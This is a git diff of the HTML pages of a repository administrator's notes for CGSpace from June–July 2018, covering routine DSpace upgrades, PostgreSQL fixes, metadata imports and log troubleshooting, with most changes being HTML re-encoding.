&#34;Buruchara, Robin&#34;,Robin Buruchara: 0000-0003-0934-1218
&#34;Buruchara, Robin A.&#34;,Robin Buruchara: 0000-0003-0934-1218
</code></pre><ul>
<li>On a hunch I checked to see if CGSpace&rsquo;s bitstream cleanup was working properly and of course it&rsquo;s broken:</li>
</ul>
<pre><code>$ dspace cleanup -v
<pre tabindex="0"><code>$ dspace cleanup -v
...
Error: ERROR: update or delete on table &quot;bitstream&quot; violates foreign key constraint &quot;bundle_primary_bitstream_id_fkey&quot; on table &quot;bundle&quot;
Detail: Key (bitstream_id)=(152402) is still referenced from table &quot;bundle&quot;.
Error: ERROR: update or delete on table &#34;bitstream&#34; violates foreign key constraint &#34;bundle_primary_bitstream_id_fkey&#34; on table &#34;bundle&#34;
Detail: Key (bitstream_id)=(152402) is still referenced from table &#34;bundle&#34;.
</code></pre><ul>
<li>As always, the solution is to delete that ID manually in PostgreSQL:</li>
</ul>
<pre><code>$ psql dspace -c 'update bundle set primary_bitstream_id=NULL where primary_bitstream_id in (152402);'
<pre tabindex="0"><code>$ psql dspace -c &#39;update bundle set primary_bitstream_id=NULL where primary_bitstream_id in (152402);&#39;
UPDATE 1
</code></pre><h2 id="2018-06-14">2018-06-14</h2>
<ul>
@ -387,11 +387,11 @@ UPDATE 1
<ul>
<li>I was restoring a PostgreSQL dump on my test machine and found a way to restore the CGSpace dump as the <code>postgres</code> user, but have the owner of the schema be the <code>dspacetest</code> user:</li>
</ul>
<pre><code>$ dropdb -h localhost -U postgres dspacetest
<pre tabindex="0"><code>$ dropdb -h localhost -U postgres dspacetest
$ createdb -h localhost -U postgres -O dspacetest --encoding=UNICODE dspacetest
$ psql -h localhost -U postgres dspacetest -c 'alter user dspacetest superuser;'
$ psql -h localhost -U postgres dspacetest -c &#39;alter user dspacetest superuser;&#39;
$ pg_restore -h localhost -U postgres -d dspacetest -O --role=dspacetest -h localhost /tmp/cgspace_2018-06-24.backup
$ psql -h localhost -U postgres dspacetest -c 'alter user dspacetest nosuperuser;'
$ psql -h localhost -U postgres dspacetest -c &#39;alter user dspacetest nosuperuser;&#39;
</code></pre><ul>
<li>The <code>-O</code> option to <code>pg_restore</code> makes the import process ignore ownership specified in the dump itself, and instead makes the schema owned by the user doing the restore</li>
<li>I always prefer to use the <code>postgres</code> user locally because it&rsquo;s just easier than remembering the <code>dspacetest</code> user&rsquo;s password, but then I couldn&rsquo;t figure out why the resulting schema was owned by <code>postgres</code></li>
@ -407,44 +407,44 @@ $ psql -h localhost -U postgres dspacetest -c 'alter user dspacetest nosuperuser
<li>There is already a search filter for this field defined in <code>discovery.xml</code> but we aren&rsquo;t using it, so I quickly enabled and tested it, then merged it to the <code>5_x-prod</code> branch (<a href="https://github.com/ilri/DSpace/pull/380">#380</a>)</li>
<li>Back to testing the DSpace 5.8 changes from Atmire, I had another issue with SQL migrations:</li>
</ul>
<pre><code>Caused by: org.flywaydb.core.api.FlywayException: Validate failed. Found differences between applied migrations and available migrations: Detected applied migration missing on the classpath: 5.8.2015.12.03.3
<pre tabindex="0"><code>Caused by: org.flywaydb.core.api.FlywayException: Validate failed. Found differences between applied migrations and available migrations: Detected applied migration missing on the classpath: 5.8.2015.12.03.3
</code></pre><ul>
<li>It took me a while to figure out that this migration is for MQM, which I removed after Atmire&rsquo;s original advice about the migrations so we actually need to delete this migration instead up updating it</li>
<li>So I need to make sure to run the following during the DSpace 5.8 upgrade:</li>
</ul>
<pre><code>-- Delete existing CUA 4 migration if it exists
delete from schema_version where version = '5.6.2015.12.03.2';
<pre tabindex="0"><code>-- Delete existing CUA 4 migration if it exists
delete from schema_version where version = &#39;5.6.2015.12.03.2&#39;;
-- Update version of CUA 4 migration
update schema_version set version = '5.6.2015.12.03.2' where version = '5.5.2015.12.03.2';
update schema_version set version = &#39;5.6.2015.12.03.2&#39; where version = &#39;5.5.2015.12.03.2&#39;;
-- Delete MQM migration since we're no longer using it
delete from schema_version where version = '5.5.2015.12.03.3';
-- Delete MQM migration since we&#39;re no longer using it
delete from schema_version where version = &#39;5.5.2015.12.03.3&#39;;
</code></pre><ul>
<li>After that you can run the migrations manually and then DSpace should work fine:</li>
</ul>
<pre><code>$ ~/dspace/bin/dspace database migrate ignored
<pre tabindex="0"><code>$ ~/dspace/bin/dspace database migrate ignored
...
Done.
</code></pre><ul>
<li>Elizabeth from CIAT contacted me to ask if I could add ORCID identifiers to all of Andy Jarvis' items on CGSpace</li>
<li>Elizabeth from CIAT contacted me to ask if I could add ORCID identifiers to all of Andy Jarvis&rsquo; items on CGSpace</li>
<li>I used my <a href="https://gist.githubusercontent.com/alanorth/a49d85cd9c5dea89cddbe809813a7050/raw/f67b6e45a9a940732882ae4bb26897a9b245ef31/add-orcid-identifiers-csv.py">add-orcid-identifiers-csv.py</a> script:</li>
</ul>
<pre><code>$ ./add-orcid-identifiers-csv.py -i 2018-06-24-andy-jarvis-orcid.csv -db dspacetest -u dspacetest -p 'fuuu'
<pre tabindex="0"><code>$ ./add-orcid-identifiers-csv.py -i 2018-06-24-andy-jarvis-orcid.csv -db dspacetest -u dspacetest -p &#39;fuuu&#39;
</code></pre><ul>
<li>The contents of <code>2018-06-24-andy-jarvis-orcid.csv</code> were:</li>
</ul>
<pre><code>dc.contributor.author,cg.creator.id
&quot;Jarvis, A.&quot;,Andy Jarvis: 0000-0001-6543-0798
&quot;Jarvis, Andy&quot;,Andy Jarvis: 0000-0001-6543-0798
&quot;Jarvis, Andrew&quot;,Andy Jarvis: 0000-0001-6543-0798
<pre tabindex="0"><code>dc.contributor.author,cg.creator.id
&#34;Jarvis, A.&#34;,Andy Jarvis: 0000-0001-6543-0798
&#34;Jarvis, Andy&#34;,Andy Jarvis: 0000-0001-6543-0798
&#34;Jarvis, Andrew&#34;,Andy Jarvis: 0000-0001-6543-0798
</code></pre><h2 id="2018-06-26">2018-06-26</h2>
<ul>
<li>Atmire got back to me to say that we can remove the <code>itemCollectionPlugin</code> and <code>HasBitstreamsSSIPlugin</code> beans from DSpace&rsquo;s <code>discovery.xml</code> file, as they are used by the Metadata Quality Module (MQM) that we are not using anymore</li>
<li>I removed both those beans and did some simple tests to check item submission, media-filter of PDFs, REST API, but got an error &ldquo;No matches for the query&rdquo; when listing records in OAI</li>
<li>This warning appears in the DSpace log:</li>
</ul>
<pre><code>2018-06-26 16:58:12,052 WARN org.dspace.xoai.services.impl.xoai.DSpaceRepositoryConfiguration @ { OAI 2.0 :: DSpace } Not able to retrieve the dspace.oai.url property from oai.cfg. Falling back to request address
<pre tabindex="0"><code>2018-06-26 16:58:12,052 WARN org.dspace.xoai.services.impl.xoai.DSpaceRepositoryConfiguration @ { OAI 2.0 :: DSpace } Not able to retrieve the dspace.oai.url property from oai.cfg. Falling back to request address
</code></pre><ul>
<li>It&rsquo;s actually only a warning and it also appears in the logs on DSpace Test (which is currently running DSpace 5.5), so I need to keep troubleshooting</li>
<li>Ah, I think I just need to run <code>dspace oai import</code></li>
@ -455,27 +455,27 @@ Done.
<li>I&rsquo;ll have to figure out how to separate those we&rsquo;re keeping, deleting, and mapping into CIFOR&rsquo;s archive collection</li>
<li>First, get the 62 deletes from Vika&rsquo;s file and remove them from the collection:</li>
</ul>
<pre><code>$ grep delete 2018-06-22-cifor-duplicates.txt | grep -o -E '[0-9]{5}\/[0-9]{5}' &gt; cifor-handle-to-delete.txt
<pre tabindex="0"><code>$ grep delete 2018-06-22-cifor-duplicates.txt | grep -o -E &#39;[0-9]{5}\/[0-9]{5}&#39; &gt; cifor-handle-to-delete.txt
$ wc -l cifor-handle-to-delete.txt
62 cifor-handle-to-delete.txt
$ wc -l 10568-92904.csv
2461 10568-92904.csv
$ while read line; do sed -i &quot;\#$line#d&quot; 10568-92904.csv; done &lt; cifor-handle-to-delete.txt
$ while read line; do sed -i &#34;\#$line#d&#34; 10568-92904.csv; done &lt; cifor-handle-to-delete.txt
$ wc -l 10568-92904.csv
2399 10568-92904.csv
</code></pre><ul>
<li>This iterates over the handles for deletion and uses <code>sed</code> with an alternative pattern delimiter of &lsquo;#&rsquo; (which must be escaped), because the pattern itself contains a &lsquo;/&rsquo;</li>
<li>The mapped ones will be difficult because we need their internal IDs in order to map them, and there are 50 of them:</li>
</ul>
<pre><code>$ grep map 2018-06-22-cifor-duplicates.txt | grep -o -E '[0-9]{5}\/[0-9]{5}' &gt; cifor-handle-to-map.txt
<pre tabindex="0"><code>$ grep map 2018-06-22-cifor-duplicates.txt | grep -o -E &#39;[0-9]{5}\/[0-9]{5}&#39; &gt; cifor-handle-to-map.txt
$ wc -l cifor-handle-to-map.txt
50 cifor-handle-to-map.txt
</code></pre><ul>
<li>I can either get them from the databse, or programatically export the metadata using <code>dspace metadata-export -i 10568/xxxxx</code>&hellip;</li>
<li>Oooh, I can export the items one by one, concatenate them together, remove the headers, and extract the <code>id</code> and <code>collection</code> columns using <a href="https://csvkit.readthedocs.io/">csvkit</a>:</li>
</ul>
<pre><code>$ while read line; do filename=${line/\//-}.csv; dspace metadata-export -i $line -f $filename; done &lt; /tmp/cifor-handle-to-map.txt
$ sed '/^id/d' 10568-*.csv | csvcut -c 1,2 &gt; map-to-cifor-archive.csv
<pre tabindex="0"><code>$ while read line; do filename=${line/\//-}.csv; dspace metadata-export -i $line -f $filename; done &lt; /tmp/cifor-handle-to-map.txt
$ sed &#39;/^id/d&#39; 10568-*.csv | csvcut -c 1,2 &gt; map-to-cifor-archive.csv
</code></pre><ul>
<li>Then I can use Open Refine to add the &ldquo;CIFOR Archive&rdquo; collection to the mappings</li>
<li>Importing the 2398 items via <code>dspace metadata-import</code> ends up with a Java garbage collection error, so I think I need to do it in batches of 1,000</li>
@ -487,7 +487,7 @@ $ sed '/^id/d' 10568-*.csv | csvcut -c 1,2 &gt; map-to-cifor-archive.csv
<li>DSpace Test appears to have crashed last night</li>
<li>There is nothing in the Tomcat or DSpace logs, but I see the following in <code>dmesg -T</code>:</li>
</ul>
<pre><code>[Thu Jun 28 00:00:30 2018] Out of memory: Kill process 14501 (java) score 701 or sacrifice child
<pre tabindex="0"><code>[Thu Jun 28 00:00:30 2018] Out of memory: Kill process 14501 (java) score 701 or sacrifice child
[Thu Jun 28 00:00:30 2018] Killed process 14501 (java) total-vm:14926704kB, anon-rss:5693608kB, file-rss:0kB, shmem-rss:0kB
[Thu Jun 28 00:00:30 2018] oom_reaper: reaped process 14501 (java), now anon-rss:0kB, file-rss:0kB, shmem-rss:0kB
</code></pre><ul>
@ -517,15 +517,15 @@ $ sed '/^id/d' 10568-*.csv | csvcut -c 1,2 &gt; map-to-cifor-archive.csv
<ol class="list-unstyled">
<li><a href="/cgspace-notes/2021-08/">August, 2021</a></li>
<li><a href="/cgspace-notes/2025-01/">January, 2025</a></li>
<li><a href="/cgspace-notes/2021-07/">July, 2021</a></li>
<li><a href="/cgspace-notes/2024-12/">December, 2024</a></li>
<li><a href="/cgspace-notes/2021-06/">June, 2021</a></li>
<li><a href="/cgspace-notes/2024-11/">November, 2024</a></li>
<li><a href="/cgspace-notes/2021-05/">May, 2021</a></li>
<li><a href="/cgspace-notes/2024-10/">October, 2024</a></li>
<li><a href="/cgspace-notes/2021-04/">April, 2021</a></li>
<li><a href="/cgspace-notes/2024-09/">September, 2024</a></li>
</ol>
</section>

View File

@ -36,7 +36,7 @@ During the mvn package stage on the 5.8 branch I kept getting issues with java r
There is insufficient memory for the Java Runtime Environment to continue.
"/>
<meta name="generator" content="Hugo 0.87.0" />
<meta name="generator" content="Hugo 0.133.1">
@ -66,12 +66,12 @@ There is insufficient memory for the Java Runtime Environment to continue.
<!-- combined, minified CSS -->
<link href="https://alanorth.github.io/cgspace-notes/css/style.beb8012edc08ba10be012f079d618dc243812267efe62e11f22fe49618f976a4.css" rel="stylesheet" integrity="sha256-vrgBLtwIuhC&#43;AS8HnWGNwkOBImfv5i4R8i/klhj5dqQ=" crossorigin="anonymous">
<link href="https://alanorth.github.io/cgspace-notes/css/style.c6ba80bc50669557645abe05f86b73cc5af84408ed20f1551a267bc19ece8228.css" rel="stylesheet" integrity="sha256-xrqAvFBmlVdkWr4F&#43;GtzzFr4RAjtIPFVGiZ7wZ7Ogig=" crossorigin="anonymous">
<!-- minified Font Awesome for SVG icons -->
<script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.ffbfea088a9a1666ec65c3a8cb4906e2a0e4f92dc70dbbf400a125ad2422123a.js" integrity="sha256-/7/qCIqaFmbsZcOoy0kG4qDk&#43;S3HDbv0AKElrSQiEjo=" crossorigin="anonymous"></script>
<script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.f5072c55a0721857184db93a50561d7dc13975b4de2e19db7f81eb5f3fa57270.js" integrity="sha256-9QcsVaByGFcYTbk6UFYdfcE5dbTeLhnbf4HrXz&#43;lcnA=" crossorigin="anonymous"></script>
<!-- RSS 2.0 feed -->
@ -117,7 +117,7 @@ There is insufficient memory for the Java Runtime Environment to continue.
<p class="blog-post-meta">
<time datetime="2018-07-01T12:56:54+03:00">Sun Jul 01, 2018</time>
in
<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/cgspace-notes/categories/notes/" rel="category tag">Notes</a>
<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
</p>
@ -126,20 +126,20 @@ There is insufficient memory for the Java Runtime Environment to continue.
<ul>
<li>I want to upgrade DSpace Test to DSpace 5.8 so I took a backup of its current database just in case:</li>
</ul>
<pre><code>$ pg_dump -b -v -o --format=custom -U dspace -f dspace-2018-07-01.backup dspace
<pre tabindex="0"><code>$ pg_dump -b -v -o --format=custom -U dspace -f dspace-2018-07-01.backup dspace
</code></pre><ul>
<li>During the <code>mvn package</code> stage on the 5.8 branch I kept getting issues with java running out of memory:</li>
</ul>
<pre><code>There is insufficient memory for the Java Runtime Environment to continue.
<pre tabindex="0"><code>There is insufficient memory for the Java Runtime Environment to continue.
</code></pre><ul>
<li>As the machine only has 8GB of RAM, I reduced the Tomcat memory heap from 5120m to 4096m so I could try to allocate more to the build process:</li>
</ul>
<pre><code>$ export JAVA_OPTS=&quot;-Dfile.encoding=UTF-8 -Xmx1024m&quot;
<pre tabindex="0"><code>$ export JAVA_OPTS=&#34;-Dfile.encoding=UTF-8 -Xmx1024m&#34;
$ mvn -U -Dmirage2.on=true -Dmirage2.deps.included=false -Denv=dspacetest.cgiar.org -P \!dspace-lni,\!dspace-rdf,\!dspace-sword,\!dspace-swordv2 clean package
</code></pre><ul>
<li>Then I stopped the Tomcat 7 service, ran the ant update, and manually ran the old and ignored SQL migrations:</li>
</ul>
<pre><code>$ sudo su - postgres
<pre tabindex="0"><code>$ sudo su - postgres
$ psql dspace
...
dspace=# begin;
@ -171,29 +171,29 @@ $ dspace database migrate ignored
</ul>
</li>
</ul>
<pre><code>$ export JAVA_OPTS=&quot;-Dfile.encoding=UTF-8 -Xmx1024m&quot;
<pre tabindex="0"><code>$ export JAVA_OPTS=&#34;-Dfile.encoding=UTF-8 -Xmx1024m&#34;
$ dspace metadata-import -e aorth@mjanja.ch -f /tmp/2018-06-27-New-CIFOR-Archive.csv
$ dspace metadata-import -e aorth@mjanja.ch -f /tmp/2018-06-27-New-CIFOR-Archive2.csv
</code></pre><ul>
<li>I noticed there are many items that use HTTP instead of HTTPS for their Google Books URL, and some missing HTTP entirely:</li>
</ul>
<pre><code>dspace=# select count(*) from metadatavalue where resource_type_id=2 and metadata_field_id=222 and text_value like 'http://books.google.%';
<pre tabindex="0"><code>dspace=# select count(*) from metadatavalue where resource_type_id=2 and metadata_field_id=222 and text_value like &#39;http://books.google.%&#39;;
count
-------
785
dspace=# select count(*) from metadatavalue where resource_type_id=2 and metadata_field_id=222 and text_value ~ '^books\.google\..*';
dspace=# select count(*) from metadatavalue where resource_type_id=2 and metadata_field_id=222 and text_value ~ &#39;^books\.google\..*&#39;;
count
-------
4
</code></pre><ul>
<li>I think I should fix that as well as some other garbage values like &ldquo;test&rdquo; and &ldquo;dspace.ilri.org&rdquo; etc:</li>
</ul>
<pre><code>dspace=# begin;
dspace=# update metadatavalue set text_value = regexp_replace(text_value, 'http://books.google', 'https://books.google') where resource_type_id=2 and metadata_field_id=222 and text_value like 'http://books.google.%';
<pre tabindex="0"><code>dspace=# begin;
dspace=# update metadatavalue set text_value = regexp_replace(text_value, &#39;http://books.google&#39;, &#39;https://books.google&#39;) where resource_type_id=2 and metadata_field_id=222 and text_value like &#39;http://books.google.%&#39;;
UPDATE 785
dspace=# update metadatavalue set text_value = regexp_replace(text_value, 'books.google', 'https://books.google') where resource_type_id=2 and metadata_field_id=222 and text_value ~ '^books\.google\..*';
dspace=# update metadatavalue set text_value = regexp_replace(text_value, &#39;books.google&#39;, &#39;https://books.google&#39;) where resource_type_id=2 and metadata_field_id=222 and text_value ~ &#39;^books\.google\..*&#39;;
UPDATE 4
dspace=# update metadatavalue set text_value='https://books.google.com/books?id=meF1CLdPSF4C' where resource_type_id=2 and metadata_field_id=222 and text_value='meF1CLdPSF4C';
dspace=# update metadatavalue set text_value=&#39;https://books.google.com/books?id=meF1CLdPSF4C&#39; where resource_type_id=2 and metadata_field_id=222 and text_value=&#39;meF1CLdPSF4C&#39;;
UPDATE 1
dspace=# delete from metadatavalue where resource_type_id=2 and metadata_field_id=222 and metadata_value_id in (2299312, 10684, 10700, 996403);
DELETE 4
@ -201,8 +201,8 @@ dspace=# commit;
</code></pre><ul>
<li>Testing DSpace 5.8 with PostgreSQL 9.6 and Tomcat 8.5.32 (instead of my usual 7.0.88) and for some reason I get autowire errors on Catalina startup with 8.5.32:</li>
</ul>
<pre><code>03-Jul-2018 19:51:37.272 SEVERE [localhost-startStop-1] org.apache.catalina.core.StandardContext.listenerStart Exception sending context initialized event to listener instance of class [org.dspace.servicemanager.servlet.DSpaceKernelServletContextListener]
java.lang.RuntimeException: Failure during filter init: Failed to startup the DSpace Service Manager: failure starting up spring service manager: Error creating bean with name 'conversionService' defined in file [/home/aorth/dspace/config/spring/xmlui/spring-dspace-addon-cua-services.xml]: Cannot create inner bean 'com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$ColumnsConverter#3f6c3e6a' of type [com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$ColumnsConverter] while setting bean property 'converters' with key [1]; nested exception is org.springframework.beans.factory.BeanCreationException: Error creating bean with name 'com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$ColumnsConverter#3f6c3e6a': Injection of autowired dependencies failed; nested exception is org.springframework.beans.factory.BeanCreationException: Could not autowire field: private com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$FilterConverter com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$ColumnsConverter.filterConverter; nested exception is org.springframework.beans.factory.NoSuchBeanDefinitionException: No matching bean of type [com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$FilterConverter] found for dependency: expected at least 1 bean which qualifies as autowire candidate for this dependency. Dependency annotations: {@org.springframework.beans.factory.annotation.Autowired(required=true)}
<pre tabindex="0"><code>03-Jul-2018 19:51:37.272 SEVERE [localhost-startStop-1] org.apache.catalina.core.StandardContext.listenerStart Exception sending context initialized event to listener instance of class [org.dspace.servicemanager.servlet.DSpaceKernelServletContextListener]
java.lang.RuntimeException: Failure during filter init: Failed to startup the DSpace Service Manager: failure starting up spring service manager: Error creating bean with name &#39;conversionService&#39; defined in file [/home/aorth/dspace/config/spring/xmlui/spring-dspace-addon-cua-services.xml]: Cannot create inner bean &#39;com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$ColumnsConverter#3f6c3e6a&#39; of type [com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$ColumnsConverter] while setting bean property &#39;converters&#39; with key [1]; nested exception is org.springframework.beans.factory.BeanCreationException: Error creating bean with name &#39;com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$ColumnsConverter#3f6c3e6a&#39;: Injection of autowired dependencies failed; nested exception is org.springframework.beans.factory.BeanCreationException: Could not autowire field: private com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$FilterConverter com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$ColumnsConverter.filterConverter; nested exception is org.springframework.beans.factory.NoSuchBeanDefinitionException: No matching bean of type [com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$FilterConverter] found for dependency: expected at least 1 bean which qualifies as autowire candidate for this dependency. Dependency annotations: {@org.springframework.beans.factory.annotation.Autowired(required=true)}
at org.dspace.servicemanager.servlet.DSpaceKernelServletContextListener.contextInitialized(DSpaceKernelServletContextListener.java:92)
at org.apache.catalina.core.StandardContext.listenerStart(StandardContext.java:4792)
at org.apache.catalina.core.StandardContext.startInternal(StandardContext.java:5256)
@ -217,7 +217,7 @@ dspace=# commit;
at java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1149)
at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:624)
at java.lang.Thread.run(Thread.java:748)
Caused by: java.lang.RuntimeException: Failed to startup the DSpace Service Manager: failure starting up spring service manager: Error creating bean with name 'conversionService' defined in file [/home/aorth/dspace/config/spring/xmlui/spring-dspace-addon-cua-services.xml]: Cannot create inner bean 'com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$ColumnsConverter#3f6c3e6a' of type [com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$ColumnsConverter] while setting bean property 'converters' with key [1]; nested exception is org.springframework.beans.factory.BeanCreationException: Error creating bean with name 'com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$ColumnsConverter#3f6c3e6a': Injection of autowired dependencies failed; nested exception is org.springframework.beans.factory.BeanCreationException: Could not autowire field: private com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$FilterConverter com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$ColumnsConverter.filterConverter; nested exception is org.springframework.beans.factory.NoSuchBeanDefinitionException: No matching bean of type [com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$FilterConverter] found for dependency: expected at least 1 bean which qualifies as autowire candidate for this dependency. Dependency annotations: {@org.springframework.beans.factory.annotation.Autowired(required=true)}
Caused by: java.lang.RuntimeException: Failed to startup the DSpace Service Manager: failure starting up spring service manager: Error creating bean with name &#39;conversionService&#39; defined in file [/home/aorth/dspace/config/spring/xmlui/spring-dspace-addon-cua-services.xml]: Cannot create inner bean &#39;com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$ColumnsConverter#3f6c3e6a&#39; of type [com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$ColumnsConverter] while setting bean property &#39;converters&#39; with key [1]; nested exception is org.springframework.beans.factory.BeanCreationException: Error creating bean with name &#39;com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$ColumnsConverter#3f6c3e6a&#39;: Injection of autowired dependencies failed; nested exception is org.springframework.beans.factory.BeanCreationException: Could not autowire field: private com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$FilterConverter com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$ColumnsConverter.filterConverter; nested exception is org.springframework.beans.factory.NoSuchBeanDefinitionException: No matching bean of type [com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$FilterConverter] found for dependency: expected at least 1 bean which qualifies as autowire candidate for this dependency. Dependency annotations: {@org.springframework.beans.factory.annotation.Autowired(required=true)}
</code></pre><ul>
<li>Gotta check that out later&hellip;</li>
</ul>
@ -241,7 +241,7 @@ Caused by: java.lang.RuntimeException: Failed to startup the DSpace Service Mana
<li>It looks like I added Solr to the <code>backup_to_s3.sh</code> script, but that script is not even being used (<code>s3cmd</code> is run directly from root&rsquo;s crontab)</li>
<li>For now I have just initiated a manual S3 backup of the Solr data:</li>
</ul>
<pre><code># s3cmd sync --delete-removed /home/backup/solr/ s3://cgspace.cgiar.org/solr/
<pre tabindex="0"><code># s3cmd sync --delete-removed /home/backup/solr/ s3://cgspace.cgiar.org/solr/
</code></pre><ul>
<li>But I need to add this to cron!</li>
<li>I wonder if I should convert some of the cron jobs to systemd services / timers&hellip;</li>
@ -249,7 +249,7 @@ Caused by: java.lang.RuntimeException: Failed to startup the DSpace Service Mana
<li>Abenet wants to be able to search by journal title (dc.source) in the advanced Discovery search so I opened an issue for it (<a href="https://github.com/ilri/DSpace/issues/384">#384</a>)</li>
<li>I regenerated the list of names for all our ORCID iDs using my <a href="https://gist.github.com/alanorth/57a88379126d844563c1410bd7b8d12b">resolve-orcids.py</a> script:</li>
</ul>
<pre><code>$ grep -oE '[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}' ~/src/git/DSpace/dspace/config/controlled-vocabularies/cg-creator-id.xml | sort | uniq &gt; /tmp/2018-07-08-orcids.txt
<pre tabindex="0"><code>$ grep -oE &#39;[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}&#39; ~/src/git/DSpace/dspace/config/controlled-vocabularies/cg-creator-id.xml | sort | uniq &gt; /tmp/2018-07-08-orcids.txt
$ ./resolve-orcids.py -i /tmp/2018-07-08-orcids.txt -o /tmp/2018-07-08-names.txt -d
</code></pre><ul>
<li>But after comparing to the existing list of names I didn&rsquo;t see much change, so I just ignored it</li>
@ -259,22 +259,22 @@ $ ./resolve-orcids.py -i /tmp/2018-07-08-orcids.txt -o /tmp/2018-07-08-names.txt
<li>Uptime Robot said that CGSpace was down for two minutes early this morning but I don&rsquo;t see anything in Tomcat logs or dmesg</li>
<li>Uptime Robot said that CGSpace was down for two minutes again later in the day, and this time I saw a memory error in Tomcat&rsquo;s <code>catalina.out</code>:</li>
</ul>
<pre><code>Exception in thread &quot;http-bio-127.0.0.1-8081-exec-557&quot; java.lang.OutOfMemoryError: Java heap space
<pre tabindex="0"><code>Exception in thread &#34;http-bio-127.0.0.1-8081-exec-557&#34; java.lang.OutOfMemoryError: Java heap space
</code></pre><ul>
<li>I&rsquo;m not sure if it&rsquo;s the same error, but I see this in DSpace&rsquo;s <code>solr.log</code>:</li>
</ul>
<pre><code>2018-07-09 06:25:09,913 ERROR org.apache.solr.servlet.SolrDispatchFilter @ null:java.lang.RuntimeException: java.lang.OutOfMemoryError: Java heap space
<pre tabindex="0"><code>2018-07-09 06:25:09,913 ERROR org.apache.solr.servlet.SolrDispatchFilter @ null:java.lang.RuntimeException: java.lang.OutOfMemoryError: Java heap space
</code></pre><ul>
<li>I see a strange error around that time in <code>dspace.log.2018-07-08</code>:</li>
</ul>
<pre><code>2018-07-09 06:23:43,510 ERROR com.atmire.statistics.SolrLogThread @ IOException occured when talking to server at: http://localhost:8081/solr/statistics
<pre tabindex="0"><code>2018-07-09 06:23:43,510 ERROR com.atmire.statistics.SolrLogThread @ IOException occured when talking to server at: http://localhost:8081/solr/statistics
org.apache.solr.client.solrj.SolrServerException: IOException occured when talking to server at: http://localhost:8081/solr/statistics
</code></pre><ul>
<li>But not sure what caused that&hellip;</li>
<li>I got a message from Linode tonight that CPU usage was high on CGSpace for the past few hours around 8PM GMT</li>
<li>Looking in the nginx logs I see the top ten IP addresses active today:</li>
</ul>
<pre><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &quot;09/Jul/2018&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;09/Jul/2018&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
1691 40.77.167.84
1701 40.77.167.69
1718 50.116.102.77
@ -288,7 +288,7 @@ org.apache.solr.client.solrj.SolrServerException: IOException occured when talki
</code></pre><ul>
<li>Of those, <em>all</em> except <code>70.32.83.92</code> and <code>50.116.102.77</code> are <em>NOT</em> re-using their Tomcat sessions, for example from the XMLUI logs:</li>
</ul>
<pre><code>$ grep -c -E 'session_id=[A-Z0-9]{32}:ip_addr=95.108.181.88' dspace.log.2018-07-09
<pre tabindex="0"><code>$ grep -c -E &#39;session_id=[A-Z0-9]{32}:ip_addr=95.108.181.88&#39; dspace.log.2018-07-09
4435
</code></pre><ul>
<li><code>95.108.181.88</code> appears to be Yandex, so I dunno why it&rsquo;s creating so many sessions, as its user agent should match Tomcat&rsquo;s Crawler Session Manager Valve</li>
@ -314,7 +314,7 @@ org.apache.solr.client.solrj.SolrServerException: IOException occured when talki
<li>Linode sent an alert about CPU usage on CGSpace again, about 13:00UTC</li>
<li>These are the top ten users in the last two hours:</li>
</ul>
<pre><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &quot;10/Jul/2018:(11|12|13)&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;10/Jul/2018:(11|12|13)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
81 193.95.22.113
82 50.116.102.77
112 40.77.167.90
@ -328,7 +328,7 @@ org.apache.solr.client.solrj.SolrServerException: IOException occured when talki
</code></pre><ul>
<li>Looks like <code>213.139.52.250</code> is Moayad testing his new CGSpace vizualization thing:</li>
</ul>
